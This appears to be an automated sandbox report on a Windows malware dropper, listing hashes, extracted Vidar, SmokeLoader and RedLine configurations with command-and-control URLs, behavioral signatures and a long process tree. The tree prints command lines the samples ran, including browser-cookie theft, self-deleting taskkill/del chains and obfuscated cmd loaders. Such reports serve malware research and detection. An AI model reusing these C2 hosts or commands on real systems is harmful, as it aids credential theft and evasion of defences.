Resubmissions

  • 13-08-2021 10:16
    210813-wpta271jdx 10
  • 08-08-2021 23:00
    210808-fgs5g9pxfs 10
  • 07-08-2021 23:12
    210807-g2jw1lmd4a 10
  • 07-08-2021 16:10
    210807-51nhct4kfx 10
  • 06-08-2021 23:43
    210806-gc2271nxwj 10
  • 06-08-2021 06:00
    210806-f443x39x8a 10
  • 05-08-2021 17:08
    210805-97y6banvvx 10
  • 04-08-2021 17:25
    210804-hkxx2ntr8x 10
  • 04-08-2021 12:12
    210804-rjbg4b4y7n 10
  • 03-08-2021 17:12
    210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    86s
  • max time network
    310s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    20-07-2021 09:26

General

  • Target
    8 (17).exe
  • Size
    3.0MB
  • MD5
    bb072cad921aa5ce8b97706ce01bc570
  • SHA1
    18bf034906c1341b7817e7361ad27a4425d820bd
  • SHA256
    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97
  • SHA512
    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

  • Family
    vidar
  • Version
    39.6
  • Botnet
    933
  • C2
    https://sslamlssa1.tumblr.com/
  • Attributes
    • profile_id
      933

Extracted

  • Family
    smokeloader
  • Version
    2020
  • C2
    http://conceitosseg.com/upload/
    http://integrasidata.com/upload/
    http://ozentekstil.com/upload/
    http://finbelportal.com/upload/
    http://telanganadigital.com/upload/
  • rc4.i32
  • rc4.i32

Extracted

  • Family
    redline
  • Botnet
    AniNEW
  • C2
    akedauiver.xyz:80

Extracted

  • Family
    redline
  • Botnet
    sel16
  • C2
    dwarimlari.xyz:80

Extracted

  • Family
    redline
  • Botnet
    sel17
  • C2
    dwarimlari.xyz:80

Extracted

  • Family
    redline
  • Botnet
    1
  • C2
    ynabrdosmc.xyz:80

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 9 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • redlinestealer 9 IoCs

    RedlineStealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 52 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 11 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 18 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 20 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 7 IoCs
  • Kills process with taskkill 11 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 18 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    1⤵
    PID:1900
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
    PID:2688
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
    PID:2524
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2508
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
    1⤵
    PID:2372
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
    1⤵
    PID:2360
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s SENS
    1⤵
    PID:1436
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    1⤵
    PID:1344
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
    PID:1276
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
    PID:1092
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    1⤵
    • Drops file in System32 directory
    PID:1032
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
    PID:340
  • C:\Users\Admin\AppData\Local\Temp\8 (17).exe
    "C:\Users\Admin\AppData\Local\Temp\8 (17).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:580
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:992
      • C:\Users\Admin\AppData\Local\Temp\7zS0E3BB544\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS0E3BB544\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3588
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_1.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1268
          • C:\Users\Admin\AppData\Local\Temp\7zS0E3BB544\sonia_1.exe
            sonia_1.exe
            5⤵
            PID:3872
            • C:\Users\Admin\AppData\Local\Temp\7zS0E3BB544\sonia_1.exe
              "C:\Users\Admin\AppData\Local\Temp\7zS0E3BB544\sonia_1.exe" -a
              6⤵
              • Executes dropped EXE
              PID:2560
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_2.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1264
          • C:\Users\Admin\AppData\Local\Temp\7zS0E3BB544\sonia_2.exe
            sonia_2.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            PID:2088
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_3.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2080
          • C:\Users\Admin\AppData\Local\Temp\7zS0E3BB544\sonia_3.exe
            sonia_3.exe
            5⤵
            • Executes dropped EXE
            PID:2024
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c taskkill /im sonia_3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS0E3BB544\sonia_3.exe" & del C:\ProgramData\*.dll & exit
              6⤵
              PID:4568
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /im sonia_3.exe /f
                7⤵
                • Kills process with taskkill
                PID:4432
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 6
                7⤵
                • Delays execution with timeout.exe
                PID:4968
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_4.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:744
          • C:\Users\Admin\AppData\Local\Temp\7zS0E3BB544\sonia_4.exe
            sonia_4.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2008
            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
              "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
              6⤵
              PID:4292
              • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                7⤵
                • Executes dropped EXE
                PID:4468
                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                  8⤵
                  • Executes dropped EXE
                  PID:4648
                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                  8⤵
                  • Executes dropped EXE
                  PID:4732
              • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:4500
                • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                  C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                  8⤵
                  • Executes dropped EXE
                  PID:4880
              • C:\Users\Admin\AppData\Local\Temp\setup 326.exe
                "C:\Users\Admin\AppData\Local\Temp\setup 326.exe"
                7⤵
                PID:4560
                • C:\Windows\winnetdriv.exe
                  "C:\Users\Admin\AppData\Local\Temp\setup 326.exe" 1626780679 0
                  8⤵
                  • Executes dropped EXE
                  PID:4716
              • C:\Users\Admin\AppData\Local\Temp\setup.exe
                "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                7⤵
                • Executes dropped EXE
                PID:4628
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 764
                  8⤵
                  • Drops file in Windows directory
                  • Program crash
                  PID:1264
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 840
                  8⤵
                  • Program crash
                  PID:4420
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 892
                  8⤵
                  • Program crash
                  PID:4744
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 1056
                  8⤵
                  • Program crash
                  PID:4604
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 1088
                  8⤵
                  • Program crash
                  PID:4972
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 1008
                  8⤵
                  • Suspicious use of NtCreateProcessExOtherParentProcess
                  • Program crash
                  PID:4752
              • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                "C:\Users\Admin\AppData\Local\Temp\zhangd.exe"
                7⤵
                • Executes dropped EXE
                PID:4704
                • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                  "C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a
                  8⤵
                  • Executes dropped EXE
                  PID:4928
              • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
                7⤵
                • Executes dropped EXE
                PID:4808
                • C:\Windows\system32\WerFault.exe
                  C:\Windows\system32\WerFault.exe -u -p 4808 -s 1008
                  8⤵
                  • Program crash
                  PID:5008
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_6.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:644
          • C:\Users\Admin\AppData\Local\Temp\7zS0E3BB544\sonia_6.exe
            sonia_6.exe
            5⤵
            • Executes dropped EXE
            • Adds Run key to start application
            PID:1808
            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              6⤵
              • Executes dropped EXE
              PID:4160
            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              6⤵
              PID:5072
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_7.exe
          4⤵
          PID:2432
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_5.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:640
          • C:\Users\Admin\AppData\Local\Temp\7zS0E3BB544\sonia_5.exe
            sonia_5.exe
            5⤵
            • Executes dropped EXE
            PID:3980
            • C:\Users\Admin\Documents\n2kgkUkurNPfZ4rPkRDiCZ8D.exe
              "C:\Users\Admin\Documents\n2kgkUkurNPfZ4rPkRDiCZ8D.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:2368
              • C:\Users\Admin\Documents\n2kgkUkurNPfZ4rPkRDiCZ8D.exe
                C:\Users\Admin\Documents\n2kgkUkurNPfZ4rPkRDiCZ8D.exe
                7⤵
                • Executes dropped EXE
                PID:4936
              • C:\Users\Admin\Documents\n2kgkUkurNPfZ4rPkRDiCZ8D.exe
                C:\Users\Admin\Documents\n2kgkUkurNPfZ4rPkRDiCZ8D.exe
                7⤵
                • Executes dropped EXE
                PID:3560
            • C:\Users\Admin\Documents\Xmvosi3S5q9s1vf70AuTRMP7.exe
              "C:\Users\Admin\Documents\Xmvosi3S5q9s1vf70AuTRMP7.exe"
              6⤵
              • Executes dropped EXE
              PID:5072
              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                7⤵
                PID:4896
              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                7⤵
                • Executes dropped EXE
                PID:4652
              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                7⤵
                PID:3232
              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                7⤵
                PID:5588
            • C:\Users\Admin\Documents\HXrtv0q1weP6XdDKKQDdsKLU.exe
              "C:\Users\Admin\Documents\HXrtv0q1weP6XdDKKQDdsKLU.exe"
              6⤵
              • Executes dropped EXE
              PID:2164
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                7⤵
                • Executes dropped EXE
                PID:4292
                • C:\Windows\SysWOW64\cmd.exe
                  cmd
                  8⤵
                  PID:2668
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                    9⤵
                    PID:4696
                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                    Acre.exe.com k
                    9⤵
                    PID:5300
                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                      10⤵
                      PID:5508
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1 -n 30
                    9⤵
                    • Runs ping.exe
                    PID:5452
            • C:\Users\Admin\Documents\TLtJwuDoEyPraHCIZGosB9Ho.exe
              "C:\Users\Admin\Documents\TLtJwuDoEyPraHCIZGosB9Ho.exe"
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4552
              • C:\Users\Admin\AppData\Roaming\1234.exe
                C:\Users\Admin\AppData\Roaming\1234.exe 1234
                7⤵
                PID:5700
                • C:\Users\Admin\AppData\Roaming\1234.exe
                  "{path}"
                  8⤵
                  PID:4572
                • C:\Users\Admin\AppData\Roaming\1234.exe
                  "{path}"
                  8⤵
                  PID:6236
            • C:\Users\Admin\Documents\umiUzFrs4gEnSYdmcdKYTnJ1.exe
              "C:\Users\Admin\Documents\umiUzFrs4gEnSYdmcdKYTnJ1.exe"
              6⤵
              PID:4544
              • C:\Users\Admin\Documents\umiUzFrs4gEnSYdmcdKYTnJ1.exe
                C:\Users\Admin\Documents\umiUzFrs4gEnSYdmcdKYTnJ1.exe
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                • Modifies system certificate store
                PID:2024
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im umiUzFrs4gEnSYdmcdKYTnJ1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\umiUzFrs4gEnSYdmcdKYTnJ1.exe" & del C:\ProgramData\*.dll & exit
                  8⤵
                  PID:5156
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /im umiUzFrs4gEnSYdmcdKYTnJ1.exe /f
                    9⤵
                    • Kills process with taskkill
                    PID:5036
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 6
                    9⤵
                    • Delays execution with timeout.exe
                    PID:5312
            • C:\Users\Admin\Documents\qYin2YjUF_hPJGJtZlmUnOga.exe
              "C:\Users\Admin\Documents\qYin2YjUF_hPJGJtZlmUnOga.exe"
              6⤵
              PID:4756
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "
                7⤵
                PID:4944
                • C:\Windows\SysWOW64\explorer.exe
                  explorer https://iplogger.org/2LBCU6
                  8⤵
                  PID:3976
                • C:\Windows\SysWOW64\regedit.exe
                  regedit /s adj.reg
                  8⤵
                  • Runs .reg file with regedit
                  PID:6984
                • C:\Windows\SysWOW64\regedit.exe
                  regedit /s adj2.reg
                  8⤵
                  • Runs .reg file with regedit
                  PID:3976
              • C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe
                "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
                7⤵
                • Executes dropped EXE
                PID:3772
                                                                          • C:\Users\Admin\Documents\xvWUdDHlnd01TXDYO2PCFErZ.exe
                                                                            "C:\Users\Admin\Documents\xvWUdDHlnd01TXDYO2PCFErZ.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:4504
                                                                            • C:\Users\Admin\Documents\xvWUdDHlnd01TXDYO2PCFErZ.exe
                                                                              C:\Users\Admin\Documents\xvWUdDHlnd01TXDYO2PCFErZ.exe
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:4804
                                                                          • C:\Users\Admin\Documents\AAd0pxF1GB3yLUEniOe8fRZV.exe
                                                                            "C:\Users\Admin\Documents\AAd0pxF1GB3yLUEniOe8fRZV.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:3356
                                                                            • C:\Users\Admin\Documents\AAd0pxF1GB3yLUEniOe8fRZV.exe
                                                                              C:\Users\Admin\Documents\AAd0pxF1GB3yLUEniOe8fRZV.exe
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:4316
                                                                          • C:\Users\Admin\Documents\Y42RALenFtxiXTQcfOrTbrCk.exe
                                                                            "C:\Users\Admin\Documents\Y42RALenFtxiXTQcfOrTbrCk.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:3668
                                                                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:4568
                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8D1D66E5\setup_install.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\7zS8D1D66E5\setup_install.exe"
                                                                                8⤵
                                                                                  PID:4864
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                    9⤵
                                                                                      PID:5184
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8D1D66E5\karotima_1.exe
                                                                                        karotima_1.exe
                                                                                        10⤵
                                                                                          PID:5232
                                                                                          • C:\Users\Admin\Documents\iuK25qmgBrW9vZAY7xxaQxaP.exe
                                                                                            "C:\Users\Admin\Documents\iuK25qmgBrW9vZAY7xxaQxaP.exe"
                                                                                            11⤵
                                                                                              PID:5052
                                                                                              • C:\Users\Admin\Documents\iuK25qmgBrW9vZAY7xxaQxaP.exe
                                                                                                C:\Users\Admin\Documents\iuK25qmgBrW9vZAY7xxaQxaP.exe
                                                                                                12⤵
                                                                                                  PID:3100
                                                                                              • C:\Users\Admin\Documents\dkvzqGenhgZsn9kTgp29EtzW.exe
                                                                                                "C:\Users\Admin\Documents\dkvzqGenhgZsn9kTgp29EtzW.exe"
                                                                                                11⤵
                                                                                                  PID:3888
                                                                                                  • C:\Users\Admin\Documents\dkvzqGenhgZsn9kTgp29EtzW.exe
                                                                                                    C:\Users\Admin\Documents\dkvzqGenhgZsn9kTgp29EtzW.exe
                                                                                                    12⤵
                                                                                                      PID:4820
                                                                                                  • C:\Users\Admin\Documents\H6BqqaIbVSzKExSulJShGSsT.exe
                                                                                                    "C:\Users\Admin\Documents\H6BqqaIbVSzKExSulJShGSsT.exe"
                                                                                                    11⤵
                                                                                                      PID:4112
                                                                                                    • C:\Users\Admin\Documents\KIheDYNbfgdOx4mRlwkNctFq.exe
                                                                                                      "C:\Users\Admin\Documents\KIheDYNbfgdOx4mRlwkNctFq.exe"
                                                                                                      11⤵
                                                                                                        PID:4308
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                                                                          12⤵
                                                                                                            PID:5952
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              cmd
                                                                                                              13⤵
                                                                                                                PID:5228
                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                  findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                                                                                  14⤵
                                                                                                                    PID:5040
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                                                                    Acre.exe.com k
                                                                                                                    14⤵
                                                                                                                      PID:5036
                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                      ping 127.0.0.1 -n 30
                                                                                                                      14⤵
                                                                                                                      • Runs ping.exe
                                                                                                                      PID:4800
                                                                                                              • C:\Users\Admin\Documents\bzEIwO3oroX6nILwsQD4DxLq.exe
                                                                                                                "C:\Users\Admin\Documents\bzEIwO3oroX6nILwsQD4DxLq.exe"
                                                                                                                11⤵
                                                                                                                  PID:4196
                                                                                                                  • C:\Users\Admin\Documents\bzEIwO3oroX6nILwsQD4DxLq.exe
                                                                                                                    C:\Users\Admin\Documents\bzEIwO3oroX6nILwsQD4DxLq.exe
                                                                                                                    12⤵
                                                                                                                      PID:6744
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im bzEIwO3oroX6nILwsQD4DxLq.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\bzEIwO3oroX6nILwsQD4DxLq.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                        13⤵
                                                                                                                          PID:308
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill /im bzEIwO3oroX6nILwsQD4DxLq.exe /f
                                                                                                                            14⤵
                                                                                                                            • Kills process with taskkill
                                                                                                                            PID:4864
                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                            timeout /t 6
                                                                                                                            14⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:6280
                                                                                                                      • C:\Users\Admin\Documents\bzEIwO3oroX6nILwsQD4DxLq.exe
                                                                                                                        C:\Users\Admin\Documents\bzEIwO3oroX6nILwsQD4DxLq.exe
                                                                                                                        12⤵
                                                                                                                          PID:6740
                                                                                                                      • C:\Users\Admin\Documents\IHOVutvjMRMn2zP7LogGzeG1.exe
                                                                                                                        "C:\Users\Admin\Documents\IHOVutvjMRMn2zP7LogGzeG1.exe"
                                                                                                                        11⤵
                                                                                                                          PID:5880
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                            12⤵
                                                                                                                              PID:5804
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              12⤵
                                                                                                                                PID:5204
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                12⤵
                                                                                                                                  PID:6896
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                  12⤵
                                                                                                                                    PID:6680
                                                                                                                                • C:\Users\Admin\Documents\Ot_SlZtzmaFSxP7pOl2X6IGo.exe
                                                                                                                                  "C:\Users\Admin\Documents\Ot_SlZtzmaFSxP7pOl2X6IGo.exe"
                                                                                                                                  11⤵
                                                                                                                                    PID:3980
                                                                                                                                    • C:\Users\Admin\Documents\Ot_SlZtzmaFSxP7pOl2X6IGo.exe
                                                                                                                                      C:\Users\Admin\Documents\Ot_SlZtzmaFSxP7pOl2X6IGo.exe
                                                                                                                                      12⤵
                                                                                                                                        PID:6896
                                                                                                                                      • C:\Users\Admin\Documents\Ot_SlZtzmaFSxP7pOl2X6IGo.exe
                                                                                                                                        C:\Users\Admin\Documents\Ot_SlZtzmaFSxP7pOl2X6IGo.exe
                                                                                                                                        12⤵
                                                                                                                                          PID:6924
                                                                                                                                      • C:\Users\Admin\Documents\mEZ95dvRpfK6ASu2yrpoPOyD.exe
                                                                                                                                        "C:\Users\Admin\Documents\mEZ95dvRpfK6ASu2yrpoPOyD.exe"
                                                                                                                                        11⤵
                                                                                                                                          PID:2080
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                            C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                                                                                                                            12⤵
                                                                                                                                              PID:4680
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                "{path}"
                                                                                                                                                13⤵
                                                                                                                                                  PID:6316
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                  "{path}"
                                                                                                                                                  13⤵
                                                                                                                                                    PID:6152
